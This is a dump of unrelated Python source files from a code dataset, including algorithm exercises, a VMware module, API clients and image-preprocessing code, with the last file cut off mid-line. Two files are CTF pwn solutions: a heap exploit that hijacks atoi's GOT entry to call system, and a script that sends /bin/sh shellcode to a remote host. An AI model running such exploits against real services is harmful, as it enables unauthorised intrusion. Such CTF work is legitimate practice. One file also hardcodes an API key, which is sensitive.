GisetteClassification(n, m, n_edges=4*n)\n p.grad_check()\n p.distributed_check()\n # p.plot_graph()\n\n print('w_min = ' + str(p.w_min))\n print('f(w_min) = ' + str(p.f(p.w_min)))\n print('f_0(w_min) = ' + str(p.f(p.w_min, 0)))\n print('|| g(w_min) || = ' + str(np.linalg.norm(p.grad(p.w_min))))\n print('|| g_0(w_min) || = ' + str(np.linalg.norm(p.grad(p.w_min, 0))))\n\n # plt.show()\n","sub_path":"problems/gisette_classification.py","file_name":"gisette_classification.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"654017224","text":"n = int(input())\na = list(map(int, input().split()))\n\n# global count\ncount = 0\n\ndef merge(a, b):\n i = 0\n j = 0\n res = []\n global count\n\n while i < len(a) and j < len(b):\n if a[i] < b[j]:\n res.append(a[i])\n i+=1\n else:\n res.append(b[j])\n count += len(a)-i\n j+=1\n \n while i < len(a):\n res.append(a[i])\n i+=1\n while j < len(b):\n res.append(b[j])\n j+=1\n return res\n\ndef mergeSort(a):\n if len(a) <= 1:\n return a\n left = a[:len(a)//2]\n right = a[len(a)//2:]\n\n left = mergeSort(left)\n right = mergeSort(right)\n\n return merge(left, right)\n 
\n\nmergeSort(a)\nprint(count)","sub_path":"codeforces/contests/timur/sorting/H_inversion.py","file_name":"H_inversion.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"175959149","text":"class Garden(object):\n \n CHILDREN = ['Alice', 'Bob', 'Charlie', 'David', \n 'Eve', 'Fred', 'Ginny', 'Harriet', \n 'Ileana', 'Joseph', 'Kincaid', 'Larry', \n 'Samantha', 'Patricia', 'Xander', 'Roger']\n PLANTS = {p[0]: p \n for p in ['Clover', 'Grass', \n 'Radishes', 'Violets']}\n\n def __init__(self, diagram, students=None):\n self.rows = diagram.split('\\n')\n self.students = students or self.CHILDREN\n self.students.sort()\n\n def plants(self, child):\n i = self.students.index(child)\n plants = [[self.PLANTS[plant] for plant in row] \n for row in self.rows]\n return sum([row[0 + 2 * i:2 + 2 * i] \n for row in plants], [])","sub_path":"kindergarten-garden/kindergarten_garden.py","file_name":"kindergarten_garden.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"58981168","text":"#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Squarer\n#Time: 2020.11.15 20.20.51\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\n#context.log_level = 'debug'\ncontext.arch = 'amd64'\n\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n#libc=ELF('/lib/i386-linux-gnu/libc.so.6')\n\ndef add(size,cont):\n\tsh.sendlineafter('Your choice :','1')\n\tsh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))\n\tsh.sendlineafter('Content:',str(cont))\n\ndef edit(index,cont):\n\tsh.sendlineafter('Your choice :','2')\n\tsh.sendlineafter('Index :',str(index))\n\tsh.sendafter('Content: ',str(cont))\n\ndef delete(index):\n\tsh.sendlineafter('Your choice :','4')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show(index):\n\tsh.sendlineafter('Your choice :','3')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show_addr(name,addr):\n\tlog.success('The '+str(name)+' Addr:' + str(hex(addr)))\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn',27634)\n\n#extending\nadd(0x18,'A'*8)\nadd(0x18,'B'*8)\nedit(0,'A'*0x18+'\\x41')\ndelete(1)\n\n#leaking\nadd(0x38,'A'*8) #1\npayload = 'A'*0x10 + p64(0) + p64(0x21)\npayload += p64(0x38) + p64(elf.got['atoi'])\nedit(1,payload)\n\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8,'\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr',libc_addr)\nshow_addr('system_addr',system_addr)\n\n#hijacking\nedit(1,p64(system_addr))\n#gdb.attach(sh,'b*0x400E6D')\n\nsh.interactive()\n","sub_path":"npuctf_2020_easyheap/exp_r.py","file_name":"exp_r.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"36597314","text":"print(\"First Matrix: \")\r\na = [[1,2,3],\r\n [2,3,4],\r\n [3,4,5]]\r\nfor f in a:\r\n print(f)\r\nprint(\"\\nSecond Matrix: \")\r\nb = [[4,5,6],\r\n [5,6,7],\r\n [6,7,8]]\r\nfor s in b:\r\n print(s)\r\nprint(\"\\nAfter Division of a & b Matrix\")\r\nresult = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\nfor i in range(len(a)):\r\n for j in range(len(a[0])):\r\n result[i][j] = a[i][j] / b[i][j]\r\nfor r in result:\r\n print(r)","sub_path":"Data-Structure-main/Two dimensional array/Division of ab 
matrix.py","file_name":"Division of ab matrix.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33077057","text":"#!python\n#!/usr/bin/env python\nfrom pwn import *\n#p = process(\"./shellcode\")\np = remote(\"120.79.114.39\",10001)\nshellcode = \"\\x31\\xc9\\xf7\\xe1\\x51\\x68\\x2f\\x2f\\x73\"\nshellcode += \"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\"\nshellcode += \"\\x0b\\xcd\\x80\"\npayload = shellcode\np.send(payload)\np.interactive()\n\n","sub_path":"日程科目题目/PWN/shellcode/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"253393063","text":"\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.vmware import( PyVmomi,vmware_argument_spec)\n\ntry:\n from pyVmomi import vim\nexcept ImportError:\n pass\n\n\nclass PyVmomiHelper(PyVmomi):\n def __init__(self, module):\n super(PyVmomiHelper, self).__init__(module)\n \n\ndef main():\n\n argument_spec = vmware_argument_spec()\n argument_spec.update(\n name=dict(type='str'),\n uuid=dict(type='str')\n )\n\n module = AnsibleModule(argument_spec=argument_spec,\n required_one_of=[['name', 'uuid']],\n mutually_exclusive=[['name', 'uuid']],\n )\n\n pyv = PyVmomiHelper(module)\n\n # http://pubs.vmware.com/vsphere-55/topic/com.vmware.wssdk.apiref.doc/vim.SearchIndex.html\n search_index = pyv.content.searchIndex\n\n # without exception find managed objects using durable identifiers that the\n # search index can find easily. This is much better than caching information\n # that is non-durable and potentially buggy.\n\n vm = pyv.get_vm()\n\n if not vm:\n print(u\"Could not find a virtual machine to examine.\")\n exit(1)\n \n print(u\"Found Virtual Machine\")\n print(u\"=====================\")\n details = {'name': vm.summary.config.name,\n 'instance UUID': vm.summary.config.instanceUuid,\n 'bios UUID': vm.summary.config.uuid,\n 'path to VM': vm.summary.config.vmPathName,\n 'guest OS id': vm.summary.config.guestId,\n 'guest OS name': vm.summary.config.guestFullName,\n 'host name': vm.runtime.host.name,\n 'last booted timestamp': vm.runtime.bootTime}\n\n for name, value in details.items():\n print(u\" {0:{width}{base}}: {1}\".format(name, value, width=25, base='s'))\n\n print(u\" Devices:\")\n print(u\" --------\")\n for device in vm.config.hardware.device:\n # diving into each device, we pull out a few interesting bits\n dev_details = {'key': device.key,\n 'summary': device.deviceInfo.summary,\n 'device type': type(device).__name__,\n 'backing type': type(device.backing).__name__}\n\n print(u\" label: {0}\".format(device.deviceInfo.label))\n print(u\" ------------------\")\n for name, value in dev_details.items():\n print(u\" {0:{width}{base}}: {1}\".format(name, value,\n width=15, base='s'))\n\n if device.backing is None:\n continue\n\n # the following is a bit of a hack, but it lets us build a summary\n # without making many assumptions about the backing type, if the\n # backing type has a file name we *know* it's sitting on a datastore\n # and will have to have all of the following attributes.\n if hasattr(device.backing, 'fileName'):\n datastore = device.backing.datastore\n if datastore:\n print(u\" datastore\")\n print(u\" name: {0}\".format(datastore.name))\n # there may be multiple hosts, the host property\n # is a host mount info type not a host 
system type\n # but we can navigate to the host system from there\n for host_mount in datastore.host:\n host_system = host_mount.key\n print(u\" host: {0}\".format(host_system.name))\n print(u\" summary\")\n summary = {'capacity': datastore.summary.capacity,\n 'freeSpace': datastore.summary.freeSpace,\n 'file system': datastore.summary.type,\n 'url': datastore.summary.url}\n for key, val in summary.items():\n print(u\" {0}: {1}\".format(key, val))\n print(u\" fileName: {0}\".format(device.backing.fileName))\n print(u\" device ID: {0}\".format(device.backing.backingObjectId))\n\n print(u\" ------------------\")\n# start\nif __name__ == \"__main__\":\n main()\n","sub_path":"Sonam/playbook/test/sonamdrivemodule.py","file_name":"sonamdrivemodule.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"182947965","text":"import json\r\nimport requests\r\nimport time\r\n\r\n\r\ndef millis():\r\n return int(round(time.time() * 1000))\r\n\r\n\r\nclass Weather:\r\n def __init__(self, city, country, wind_speed, wind_direction, visibility, temperature, pressure, humidity,\r\n condition):\r\n self.city = city\r\n self.country = country\r\n self.wind = str(wind_speed) + \" km/h towards \" + str(wind_direction)\r\n self.visibility = visibility\r\n self.temperature = temperature\r\n self.pressure = pressure\r\n self.humidity = humidity\r\n self.condition = condition\r\n\r\n def __str__(self):\r\n return \"Location: {}, {},\\n Windspeed: {},\\n Visibility: {},\\n Temp: {},\\n Pressure: {},\\n Humidity: {},\" \\\r\n \"\\n Condition: {}\".format(self.city, self.country, self.wind, self.visibility, self.temperature,\r\n self.pressure,\r\n self.humidity, self.condition)\r\n\r\n\r\nclass WeatherGrabber:\r\n def __init__(self):\r\n self.key = \"a25b24117bec726b9c93c34d988c9c9a\"\r\n self.last_result = None\r\n self.last_request_time = millis()\r\n self.request_interval = 10 * 60 * 1000\r\n\r\n def should_get_again(self):\r\n return self.last_result is None or millis() - self.last_request_time > self.request_interval\r\n\r\n def get_current_weather(self, city):\r\n if city is not None and type(city) == str and self.should_get_again():\r\n # Get the data\r\n request = requests.get(\r\n \"https://api.openweathermap.org/data/2.5/weather?q={0}&APPID={1}\".format(city, self.key))\r\n\r\n # Check the status code\r\n if request.status_code == 200:\r\n # Decode the received data\r\n wheather_data = json.loads(request.content.decode('utf-8'))\r\n\r\n # Return a prepared weather object\r\n return self.prepare_wheather(wheather_data)\r\n\r\n # Return null\r\n return None\r\n\r\n @staticmethod\r\n def prepare_wheather(weather_data):\r\n if weather_data is not None:\r\n try:\r\n # Prepare the weather data to make it convertable into a weather object\r\n prepared_city = weather_data['name']\r\n prepared_country = weather_data['sys']['country']\r\n prepared_wind_speed = weather_data['wind']['speed']\r\n prepared_wind_degrees = weather_data['wind']['deg']\r\n prepared_visibility = weather_data['visibility']\r\n prepared_temperature = weather_data['main']['temp']\r\n prepared_pressure = weather_data['main']['pressure']\r\n prepared_humidity = weather_data['main']['humidity']\r\n prepared_condition = \"\"\r\n except:\r\n return None\r\n\r\n # Loop over the condition in order to create a condition string\r\n for condition in weather_data['weather']:\r\n prepared_condition = prepared_condition + condition['main'].lower() + \", \"\r\n\r\n # 
Remove the last two characters\r\n            prepared_condition = prepared_condition[:-2]\r\n\r\n            # Return a new weather object containing the prepared data\r\n            return Weather(prepared_city, prepared_country, prepared_wind_speed, prepared_wind_degrees,\r\n                           prepared_visibility, prepared_temperature, prepared_pressure, prepared_humidity,\r\n                           prepared_condition)\r\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"548491662","text":"import sys\nimport re\nfrom os.path import exists\n\nscript, inputfile1, inputfile2 = sys.argv\n\ndef open_parse_file(file_name):\n    filenames = {}\n    with open(file_name) as f:\n        for line in f:\n            line = re.sub(r\"[^0-9a-zA-Z]+\", \"\", line)\n            k = line\n            if k in filenames:\n                filenames[k] += 1\n            else:\n                filenames[k] = 1\n    return filenames\n\n\n\nif __name__ == '__main__':\n    if not exists(inputfile1) or not exists(inputfile2):\n        print(\"file(s) not found\")\n        sys.exit(1)\n\n    diff = 0\n    g_filenames = open_parse_file(inputfile1)\n    g_filenames2 = open_parse_file(inputfile2)\n\n    for i in g_filenames:\n        if i in g_filenames2:\n            if g_filenames[i] != g_filenames2[i]:\n                diff += 1\n                print(\"not same times,\",inputfile1, \"has \",(i,g_filenames[i]))\n                print(\"not same times,\",inputfile2, \"has \",(i,g_filenames2[i]))\n            del g_filenames2[i]\n        else:\n            diff += 1\n            print(i,\"from\", inputfile1,\"not found in\",inputfile2)\n    if len(g_filenames2) > 0:\n        for i in g_filenames2:\n            diff += 1\n            print(i,\"from\", inputfile2,\"not found in\",inputfile1)\n\n    if diff == 0:\n        print(\"Identical files!\")\n    else:\n        print(\"found\",diff,\"diffs\")\n    \n\n","sub_path":"python/find-diff.py","file_name":"find-diff.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"161685269","text":"#! 
/usr/bin/env python3\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom preprocess import join_columns\n\nbase_url = \"https://tigerweb.geo.census.gov/tigerwebmain/\"\nres = requests.get(base_url + \"TIGERweb_tract_current.html\")\nsoup = BeautifulSoup(res.content, features=\"lxml\")\n\nall_data = pd.Series(dtype=\"int\")\ncount = 0\nfor state in soup.find_all(\"td\"):\n count += 1\n link = state.find(\"a\").attrs[\"href\"]\n name = \" \".join(state.find(\"a\").text.split())\n try:\n data = pd.read_html(base_url + link)[0]\n except ValueError:\n print(link)\n continue\n join_columns(\n data,\n lambda x, y: \"{:02}{:03}\".format(x, y),\n (\"FIPS\", [\"STATE\", \"COUNTY\"]),\n )\n join_columns(\n data,\n lambda x, y: x + y,\n (\"AREA\", [\"AREALAND\", \"AREAWATER\"]),\n )\n data = data[[\"FIPS\", \"AREA\"]]\n data = data.groupby(\"FIPS\").sum()\n data = data[\"AREA\"]\n all_data = all_data.append(data)\n\nall_data.to_pickle(\"fips_area.pkl\")\n","sub_path":"get_areas.py","file_name":"get_areas.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357027141","text":"n = int( input () )\ntemp = 0\ncont = 1\npos = 1\nwhile cont < 100:\n temp = int(input())\n cont = cont + 1\n if temp > n:\n n = temp\n pos = cont\nprint(\"%d\" %n)\nprint(\"%d\" %pos)\n","sub_path":"Python/1080.py","file_name":"1080.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"531285234","text":"import pandas as pd \nfrom sklearn.externals import joblib\n\ntraining = pd.read_csv('data/raw/trainingData.csv', \n header = None, \n names = ['session_id', 'start_time', 'end_time', 'product_views'])\ntraining_labels = pd.read_csv('data/raw/trainingLabels.csv', header = None, names = ['gender'])\ntraining['is_female'] = training_labels['gender'] == 'female'\n\ntraining.start_time = pd.to_datetime(training['start_time'], format='%Y-%m-%d %H:%M:%S')\ntraining.end_time = pd.to_datetime(training['end_time'], format='%Y-%m-%d %H:%M:%S')\n\n\ntraining['week_day'] = training.start_time.apply(lambda x: x.weekday())\ntraining['start_of_months'] = training.start_time.apply(lambda x: x.date().day <= 5)\ntraining['end_of_months'] = training.start_time.apply(lambda x: x.date().day >=25)\ntraining['hour'] = training.start_time.apply(lambda x: x.hour)\ntraining['session_duration'] = (training.end_time - training.start_time).apply(lambda x: x.seconds)\n\ntraining.groupby(['week_day']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\ntraining.groupby(['start_of_months']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\ntraining.groupby(['end_of_months']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\ntraining.groupby(['hour']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\n\ntraining.groupby(['week_day']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\ntraining.groupby(['start_of_months']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\ntraining.groupby(['end_of_months']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\ntraining.groupby(['hour']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\n## count the categorical \n## Time features \n\n## product Views\ntraining['product_views_array'] = training['product_views'].apply(lambda x: [i.split('/')[:4] for i in x.split(';')])\ntraining['cate_0'] 
= training['product_views_array'].apply(lambda x: [i[0] for i in x])\ntraining['cate_1'] = training['product_views_array'].apply(lambda x: [i[1] for i in x])\ntraining['cate_2'] = training['product_views_array'].apply(lambda x: [i[2] for i in x])\ntraining['product'] = training['product_views_array'].apply(lambda x: [i[3] for i in x])\n## Categorical features \n\n## Item features \nlist_flattening = lambda x: pd.Series([inner for outer in x for inner in outer])\ncate_0 = set(list_flattening(training['cate_0']))\ncate_1 = set(list_flattening(training['cate_1']))\ncate_2 = set(list_flattening(training['cate_2']))\nproducts = set(list_flattening(training['product']))\n\ntraining.to_csv('data/processed/training.csv', index = False)\njoblib.dump(cate_0, 'data/processed/cate_0.jl')\njoblib.dump(cate_1, 'data/processed/cate_1.jl')\njoblib.dump(cate_2, 'data/processed/cate_2.jl')\njoblib.dump(products, 'data/processed/products.jl')","sub_path":"miscellaneous/exploring.py","file_name":"exploring.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"599730131","text":"import numpy as np\n\n'''\nWhat is the output of the perceptron if input=[2.4, 3.0], \nweights=[-0.5, 0.2], bias=1.0 (activation function - sign)?\n'''\n\n# weights * input + bias = [-0.5, 0.2] * [[2.4], [3.0]] + 1.0\n# = -0.5 * 2.4 + 0.2 * 3.0 + 1\n# = -1.2 + 0.6 + 1 = 0.4\ndef sigmoid(X):\n    return 1/(1+np.exp(-X))\n\nweights = np.asarray([-0.5, 0.2])\ninpt = np.asarray([2.4, 3.0])\nbias = 1.0\noutput = np.sum(inpt*weights) + bias\n\nprint(\"output: \", output)\nprint(sigmoid(output))\n\n\nprint('----------------------')\n\n'''\nIf the current weights of a perceptron are [0.2, 0.4],\ntheir gradients are=[-2.4, -1.2], and the learning rate is 0.1.\n What are the weights after the weights update operation?\n'''\n\n# W_new = W - learning_rate * gradients\ncurrentWeights = [0.2, 0.4]\ngradients = [-2.4, -1.2]\nlr = 0.1\n\nnewWeights = []\nfor i in range(len(currentWeights)):\n    newWeights.append(currentWeights[i]-lr*gradients[i])\n\nprint(newWeights)\n\n'''\nAt which points does the separating line \nof the perceptron w = [-4, 2], b = [2] intersect the axes?\n'''\n# to get the second coordinate of the point, plug the first one in as X, run it\n# and it returns the second one\n# e.g.: for x = 0 it gives -1 -> (0,-1)\n\n\ndef f(x, w, b, c=0):\n    # given x1, return x2 such that [x1,x2] are on the line w.x + b = c\n    return (-w[0] * x - b + c) / w[1]\n\nw = [-4,2]\nb = 2\nx = 0.5\n\nprint(f(x,w,b))","sub_path":"ml/lab/algoritmi/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"499556878","text":"import requests, json, time\nfrom datetime import datetime\nfrom math import ceil\nfrom src import app, db, Album, Artist\nfrom .spotify_auth import SpotifyAuth\n\n\nclass SpotifyFetcher(SpotifyAuth):\n    SPOTIFY_URL_NEW_RELEASES = \"https://api.spotify.com/v1/browse/new-releases\"\n    SPOTIFY_LIMIT_NEW_RELEASES = 50\n    SPOTIFY_EXPIRATION_MESSAGE = \"The access token expired\"\n\n    def __init__(self, access_token, expires_in, refresh_token):\n        self.__set_init(access_token, expires_in, refresh_token)\n\n    def __set_init(self, access_token, expires_in, refresh_token):\n        self.__access_token = access_token\n        self.__expires_in = expires_in\n        self.__refresh_token = refresh_token\n        self.__access_token_time = datetime.now().timestamp()\n\n    def 
__get_spotify_releases_url(self, offset):\n        return f\"{self.SPOTIFY_URL_NEW_RELEASES}?limit={self.SPOTIFY_LIMIT_NEW_RELEASES}&offset={offset}\"\n\n    def request(self, offset=0):\n        headers = {\n            \"Authorization\": f\"Bearer {self.__access_token}\"\n        }\n        url = self.__get_spotify_releases_url(offset)\n        response = requests.get(url, headers=headers)\n        status_code = response.status_code\n        if status_code == 429:\n            # Too many requests, we must wait a bit and retry\n            retry_after = int(response.headers.get('Retry-After'))\n            time.sleep(retry_after)\n            return self.request(offset)\n        response_data = json.loads(response.text)\n        if response_data.get('error'):\n            if response_data.get('error').get('status') == 401 and response_data.get('error').get('message') == self.SPOTIFY_EXPIRATION_MESSAGE:\n                # refresh token only when we're told to\n                auth_resp = self.refreshAuth(self.__refresh_token)\n                access_token = auth_resp.get('access_token')\n                expires_in = auth_resp.get('expires_in')\n                refresh_token = auth_resp.get('refresh_token')\n                self.__set_init(access_token, expires_in, refresh_token)\n                return self.request(offset)\n        return response_data\n    \n    def fetch_all(self):\n        releases = []\n        offset = 0\n        first_batch = self.request()\n        if \"error\" in first_batch:\n            url = self.__get_spotify_releases_url(offset)\n            app.logger.error(f'Error while fetching {url}. Returning empty array.\\n{json.dumps(first_batch)}')\n            return []\n        releases += first_batch.get('albums').get('items')\n        total = first_batch.get('albums').get('total')\n        nb_pages = ceil(total / self.SPOTIFY_LIMIT_NEW_RELEASES)\n        if nb_pages > 1:\n            for i in range(1, nb_pages):\n                offset = i * self.SPOTIFY_LIMIT_NEW_RELEASES\n                batch = self.request(offset)\n                if \"error\" in batch:\n                    app.logger.error(f'Error while fetching {url}. Skipping batch.\\n{json.dumps(batch)}')\n                    continue\n                releases += batch.get('albums').get('items')\n\n        return releases\n\n    def import_releases(self):\n        releases = self.fetch_all()\n        app.logger.info(f'Fetched {len(releases)} releases')\n        db_adds = 0\n        for release in releases:\n            #check if release is already in the database (avoid duplicates)\n            existing_release = Album.query.filter_by(spotify_id=release['id']).first()\n            if existing_release:\n                continue\n            artists = release['artists']\n            artist_ids = []\n            for artist in artists:\n                # check if artist is already in the database (avoid duplicates)\n                existing_artist = Artist.query.filter_by(spotify_id=artist['id']).first()\n                if not existing_artist:\n                    existing_artist = self.parse_artist(artist)\n                    db.session.add(existing_artist)\n                    db_adds += 1\n                artist_ids.append(existing_artist)\n            db.session.add(self.parse_release(release, artist_ids))\n            db_adds += 1\n        db.session.commit()\n        app.logger.info(f'Finished import ({db_adds} insertions)')\n    \n    def parse_release(self, release, artists):\n        release = Album(\n            spotify_id=release['id'],\n            name=release['name'],\n            uri=release['uri'],\n            href=release['href'],\n            album_type=release['album_type'],\n            images=release['images'],\n            external_urls=release['external_urls'],\n            available_markets=release['available_markets'],\n            artists=artists\n        )\n        return release\n\n    def parse_artist(self, artist):\n        artist = Artist(\n            spotify_id=artist['id'],\n            name=artist['name'],\n            uri=artist['uri'],\n            href=artist['href'],\n            external_urls=artist['external_urls']\n        )\n        return artist","sub_path":"src/spotify_fetcher.py","file_name":"spotify_fetcher.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"230455495","text":"#!/usr/bin/env python\n# -*- 
coding: utf-8 -*-\n# @Time : 17-8-19 下午3:56\n# @Author : yaoqi\n# @Email : yaoqi_isee@zju.edu.cn \n# @File : preprocessor.py\n\n\"\"\"Preprocess images and bounding boxes for detection\nThis script can be applied in training phase for data augmentation and test phase(multiply input for better results)\n\nA preprocessing function receives a set of input,\nimages: image data of numpy array format, shape should be [height, width, 3] and all images should have the same size\nlabels: bounding box annotation, shape should be [N, 4] encoding [xmin,ymin,xmax,ymax] which are normalized to [0,1]\noptions: a dict indicating which preprocessing method to use, current supported methods includes random flip, random crop,\n color distortion. an example of option can be options = dict{'flip':1, 'crop':1, 'distortion':1}\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport random\nimport numpy as np\nimport cv2\nimport time\n\n\ndef pointxita2corners(px):\n \"\"\"\n change the representation of a rotated bbox from point-xita form to four corner form\n :param px:[x,y,xita,w,h]\n :return:[x1,y1,x2,y2,x3,y3,x4,y4] in anti-clockwise order\n \"\"\"\n assert px.shape[1] == 5, \\\n 'input px should have 5 elements'\n [x, y, xita, w, h] = np.hsplit(px, 5)\n\n x1 = x + 0.5 * h * np.cos(xita) - 0.5 * w * np.sin(xita)\n y1 = y - 0.5 * h * np.sin(xita) - 0.5 * w * np.cos(xita)\n\n x2 = x - 0.5 * h * np.cos(xita) - 0.5 * w * np.sin(xita)\n y2 = y + 0.5 * h * np.sin(xita) - 0.5 * w * np.cos(xita)\n\n x3 = x - 0.5 * h * np.cos(xita) + 0.5 * w * np.sin(xita)\n y3 = y + 0.5 * h * np.sin(xita) + 0.5 * w * np.cos(xita)\n\n x4 = x + 0.5 * h * np.cos(xita) + 0.5 * w * np.sin(xita)\n y4 = y - 0.5 * h * np.sin(xita) + 0.5 * w * np.cos(xita)\n\n return np.hstack((x1, y1, x2, y2, x3, y3, x4, y4))\n\n\ndef corners2pointxita(corners):\n \"\"\"\n change the representation of a rotated bbox from corner form into point-xita form\n :param corners:\n :return:\n \"\"\"\n assert corners.shape[1] == 8, \\\n 'input corner should have 8 elements'\n [x1, y1, x2, y2, x3, y3, x4, y4] = np.hsplit(corners, 8)\n uc_x = 0.5 * (x1 + x4)\n uc_y = 0.5 * (y1 + y4)\n bc_x = 0.5 * (x2 + x3)\n bc_y = 0.5 * (y2 + y3)\n\n tmp = np.zeros((corners.shape[0], 1))\n xita = np.zeros((corners.shape[0], 1))\n ind = np.where(uc_x != bc_x)\n tmp[ind] = np.arctan((bc_y[ind] - uc_y[ind]) / (bc_x[ind] - uc_x[ind]))\n tmp[np.where(uc_x == bc_x)] = np.pi / 2\n xita[tmp > 0] = np.pi - tmp[tmp > 0]\n xita[tmp <= 0] = -1 * tmp[tmp <= 0]\n\n # tmp = np.pi / 2 if uc_x == bc_x else np.arctan((bc_y - uc_y) / (bc_x - uc_x))\n # xita = np.pi - tmp if tmp > 0 else -1 * tmp\n\n cx = 0.5 * (uc_x + bc_x)\n cy = 0.5 * (uc_y + bc_y)\n w = np.sqrt(np.power(x1 - x4, 2) + np.power(y1 - y4, 2))\n h = np.sqrt(np.power(x1 - x2, 2) + np.power(y1 - y2, 2))\n return np.hstack((cx, cy, xita, w, h))\n\n\ndef random_horizontal_flip(images, bboxes):\n\n def fliplr_box(bboxes):\n \"\"\"\n flip the bbox horizontally\n :param bboxes:point-xita form\n :return:flip_img and flip_bbox in np.array form\n \"\"\"\n\n corners = pointxita2corners(bboxes)\n corners[:, 0::2] = 1 - corners[:, 0::2]\n new_bboxes = corners2pointxita(corners)\n\n return new_bboxes\n\n flag = random.randint(0, 1)\n if flag == 1:\n flip_img = np.fliplr(images)\n flip_bbox = fliplr_box(bboxes)\n else:\n flip_img = images\n flip_bbox = bboxes\n\n return flip_img, flip_bbox\n\n\ndef random_crop(images, bboxes, jitter):\n\n def correct_corners(corners, dx, dy, sx, 
sy):\n \"\"\"\n correct corner coordinates according to value of random shift and scale\n :param corners:\n :param dx:\n :param dy:\n :param sx:\n :param sy:\n :return:\n \"\"\"\n assert corners.shape[1] == 8, \\\n 'input corners should have 8 elements'\n\n corners[:, 0::2] = corners[:, 0::2] * sx - dx\n corners[:, 1::2] = corners[:, 1::2] * sy - dy\n corners[corners < 0] = 0\n corners[corners > 1] = 1\n return corners\n\n jit = random.uniform(0.05, jitter)\n [h, w] = images.shape[0:2]\n [dh, dw] = [h * jit, w * jit]\n pleft = int(random.uniform(0, dw))\n pright = int(random.uniform(0, dw))\n ptop = int(random.uniform(0, dh))\n pbot = int(random.uniform(0, dh))\n\n swidth = w - pleft - pright\n sheight = h - ptop - pbot\n\n sx = swidth / w\n sy = sheight / h\n\n im = images.copy()\n cropped = im[ptop:h - pbot, pleft:w - pright, :]\n\n dx = (pleft / w) / sx\n dy = (ptop / h) / sy\n\n sized = cv2.resize(cropped, (w, h), interpolation=cv2.INTER_CUBIC)\n new_bbox = corners2pointxita(correct_corners(pointxita2corners(bboxes), dx, dy, 1.0 / sx, 1.0 / sy))\n return sized, new_bbox\n\n\ndef random_distort_color(images, bboxes):\n im_hsv = cv2.cvtColor(images, cv2.COLOR_BGR2HSV)\n h = random.uniform(0, 10)\n s = random.uniform(0.4, 1.2)\n v = random.uniform(0.4, 1.2)\n\n im_h = im_hsv[:, :, 0] + h\n im_h[im_h > 255] = im_h[im_h > 255] - 255\n im_h = im_h[:, :, np.newaxis]\n\n im_s = (np.round(im_hsv[:, :, 1] * s))[:, :, np.newaxis]\n im_v = (np.round(im_hsv[:, :, 2] * v))[:, :, np.newaxis]\n\n new_hsv = np.concatenate((im_h, im_s, im_v), 2)\n new_hsv[new_hsv > 255] = 255\n new_hsv = np.uint8(new_hsv)\n\n new_img = cv2.cvtColor(new_hsv, cv2.COLOR_HSV2BGR)\n return new_img, bboxes\n\n\ndef draw_bboxes(image, bboxes):\n \"\"\"\n draw bboxes on images to see if the annotations are right\n :param image:\n :param bboxes:\n :return:\n \"\"\"\n assert 